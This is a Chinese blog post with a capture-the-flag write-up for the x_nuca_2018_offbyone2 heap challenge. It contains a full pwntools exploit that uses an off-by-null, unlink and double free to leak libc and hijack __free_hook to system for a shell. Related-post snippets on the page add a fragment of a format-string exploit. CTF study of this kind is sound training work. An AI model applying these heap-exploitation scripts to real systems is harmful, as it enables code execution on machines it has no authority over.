x_nuca_2018_offbyone2(off by null,unlink造成doublefree)

最新推荐文章于 2022-11-18 16:17:48 发布
最新推荐文章于 2022-11-18 16:17:48 发布
阅读量3.1k 收藏 1
点赞数
分类专栏: PWN 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51251108/article/details/121429481
版权

x_nuca_2018_offbyone2:

在第七页挑了个题目做,好像不是很难
检查一下,got表可写
请添加图片描述

漏洞分析:

有个off by null请添加图片描述
这题还有输出函数,挺好做的

利用思路:

1.利用off by null 造成unlink使指针数组中,由两个指针指向同一块地方
造成doublefree,我们再顺便泄露了libc
2.劫持free_hook为system,释放填有binsh的那个chunk就getshell了

exp:

from pwn import *
#from LibcSearcher import * 
local_file  = './X-nuca_2018_offbyone2'
local_libc  = './libc-2.27.so'
remote_libc = './libc-2.27.so'
#remote_libc = '/home/glibc-all-in-one/libs/buu/libc-2.23.so'
select = 1
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node4.buuoj.cn',26179 )
    libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se      = lambda data               :r.send(data)
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims                         :r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))
o_g_32_old = [0x3ac3c, 0x3ac3e, 0x3ac42, 0x3ac49, 0x5faa5, 0x5faa6]
o_g_32 = [0x3ac6c, 0x3ac6e, 0x3ac72, 0x3ac79, 0x5fbd5, 0x5fbd6]
o_g_old = [0x45216,0x4526a,0xf02a4,0xf1147]
o_g = [0x45226, 0x4527a, 0xf0364, 0xf1207]
def debug(cmd=''):
     gdb.attach(r,cmd)
#--------------------------
def add(length,content):
    sla('>> ','1')
    sla('length: ',str(length))
    sa('your note:\n',content)
def delete(index):
    sla('>> ','2')
    sla('index: ',str(index))
def show(index):
    sla('>> ','3')
    sla('index: ',str(index))
#------------------------------
add(0x410,'aaaa\n')
add(0x88,'b'*0x80+'\n')
add(0x4f0,'cccc\n')
add(0x80,'/bin/sh\x00\n')
delete(1)
delete(0)
add(0x88,'c'*0x80+p64(0x90+0x420))
delete(2)
add(0x410,'cccc\n')
show(0)
libc_base=uu64(ru('\x7f')[-6:])-96-0x10-libc.sym['__malloc_hook']
free_hook=libc_base+libc.sym['__free_hook']
system=libc_base+libc.sym['system']
add(0x88,'a\n')
delete(0)
delete(2)
add(0x88,p64(free_hook)+'\n')
add(0x88,p64(0)+'\n')
add(0x88,p64(system)+'\n')
delete(3)
#debug()
r.interactive()

其他:

一加九十多分真爽请添加图片描述

Nq0inaen
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2018X-NUCA的unconditional_security题
03-22
2018X-NUCA比赛的密码题,unconditional_security题目的源码
众核处理器cache一致性研究综述_韩立敏1
08-03
NUCA结构中,每个核心的Cache距离内存的距离不一,这会增加一致性协议的复杂性,因为它需要处理不同核心之间的数据传输延迟。 文章还对传统的目录一致性协议进行了分析和比较,如MSI(Modified、Shared、Invalid...
BUUCTF:【x_nuca_2018_offbyone2】(off by null
weixin_51055545的博客
01-06 1250
在buu里挑了一道heap的题,是一道off by null 的题,比较容易,经典一些 例行检查:
X-nuca_2018_offbyone2
doudoudedi
02-11 473
思路 off by null构造堆重叠然这里的堆块个数充足直接打2次第一次leak libc基址 再次布置好堆块然后打free_hook拿到shell exp: from pwn import * #p=process('./X-nuca_2018_offbyone2') p=remote('node3.buuoj.cn',28262) elf=ELF('./X-nuca_2018_offbyo...
2018X-NUCA的unconditional_security
qq_39508127的博客
03-22 249
2018X-NUCA的unconditional_security 这是一道关于量子密码的题,本人比较小白官方writeup,并没有看懂,望有大神指点一下。 附件删除文件后缀,在linux里运行即可。 ...
buuoj Pwn writeup 231-235
yongbaoii的博客
08-31 333
231 pwnable_calc 232 picoctf_2018_authenticate 逻辑简单,就是一个格式化字符串漏洞,目的呢是把 bss段上的一个变量改一下。 偏移是11 exp from pwn import* context.log_level = "debug" r = remote("node4.buuoj.cn", "27718") bss = 0x804a04c payload = fmtstr_payload(11, {bss:1}) r.sendline(p
X-nuca_2018_revenge(控制程序流程的新姿势+多字节的xchg指令会清零寄存器高位)
seaaseesa的博客
07-26 648
X-nuca_2018_revenge(多字节的xchg指令会清零寄存器高位) 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,bss上存在无限溢出 由于该程序是静态编译,我们可以覆盖到下方某些函数指针,我们可以将__printf_arginfo_table虚表指针覆盖,指向我们可控的地方。 这样printf调用时,就调用相应的函数,但是rdi、rsi、rsp这些不可控 这时有一个巧妙的方法,我们让程序执行到 000000000046B9A8 mov rbx, ...
x_nuca_2018_0gadget
doudoudedi
04-30 300
思路 在bss段上有构造uaf然后劫持got表即可 exp: #!/usr/bin/python2 from pwn import * def pwn(): #p=process('./X-nuca_2018_0gadget') p=remote('node3.buuoj.cn',27565) elf=ELF('./X-nuca_2018_0gadget') libc=elf.libc ...
2016合天全国高校网安联赛专题赛--赛前指导练习题web进阶篇
07-26
2016合天全国高校网安联赛7月赛前指导练习题web进阶篇
来自La Nuca FM「De La Nuca FM」-crx插件
03-14
De La Nuca FM收音机的正式延伸 - 107.1MHz。 网络客户端DeLaNucaFM-107.1MHz。 蒙多拉州埃斯库恰斯大米西卡大区托多埃尔蒙多城堡酒店www.delanucafm.com 支持语言:español (Latinoamérica)
面向多核SOC的面向公平和位置感知的NUCA
04-07
片上网络(NoC)通常采用非统一缓存体系结构(NUCA)来组织最后一级缓存(LLC)。 但是,随着片上系统(SoC)网络规模的扩大,逐渐出现了两种趋势。 首先,网络等待时间正在成为缓存访问等待时间的主要来源。其次,...
BUUCTF刷题3
m0_51251108的博客
05-26 2747
题目:pwnable_start:wustctf2020_closed:hitcontraining_heapcreator:0ctf_2017_babyheap:ciscn_2019_es_7:jarvisoj_level5:hitcontraining_bamboobox: pwnable_start: 关键词: 汇编,泄露ebp,调试 思路: 1.查看汇编代码得知题目信息,发现read处可0x14后可溢出 2.依靠其中的write,是根据esp来确定打印addr,选择覆盖ret地址为write那里,便
pwnlib.exception.PwnlibException: Could not find ‘as‘ installed for ContextType报错解决
m0_51251108的博客
09-20 1757
做arm架构下的pwn题某个报错
2022NewStarCTF pwn大部分题解
最新发布
m0_51251108的博客
11-18 1750
今年9~10月的比赛,题目从易到难,知识面广,还是很不错的,复现一下这比赛的pwn
house of cat 学习
m0_51251108的博客
10-13 1164
house of cat的利用链学习
CISCN2021pwn pwny(数组越界,劫持exit_hook)
m0_51251108的博客
10-03 1152
CISCN2021pwn pwny(数组越界,劫持exit_hook)
用patchelf改程序后在exp中用gdb.attach()调试堆栈
m0_51251108的博客
09-28 1058
用patchelf改程序后在exp中用gdb.attach()调试堆栈
babyheap(uaf ,绕过tcache doublefree检测)
m0_51251108的博客
09-18 1058
浙江省第五届大学生网络与信息安全竞赛预赛pwn
实战环境下的网络空间安全人才培养
"全国高校网安联赛(X-NUCA)总决赛-实战环境锤炼下网络空间安全人才培养新思路" 李舟军教授在演讲中探讨了网络空间安全人才培养的新思路,结合全国高校网安联赛的实际成果,提出了当前网络安全教育的两种主要模式...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值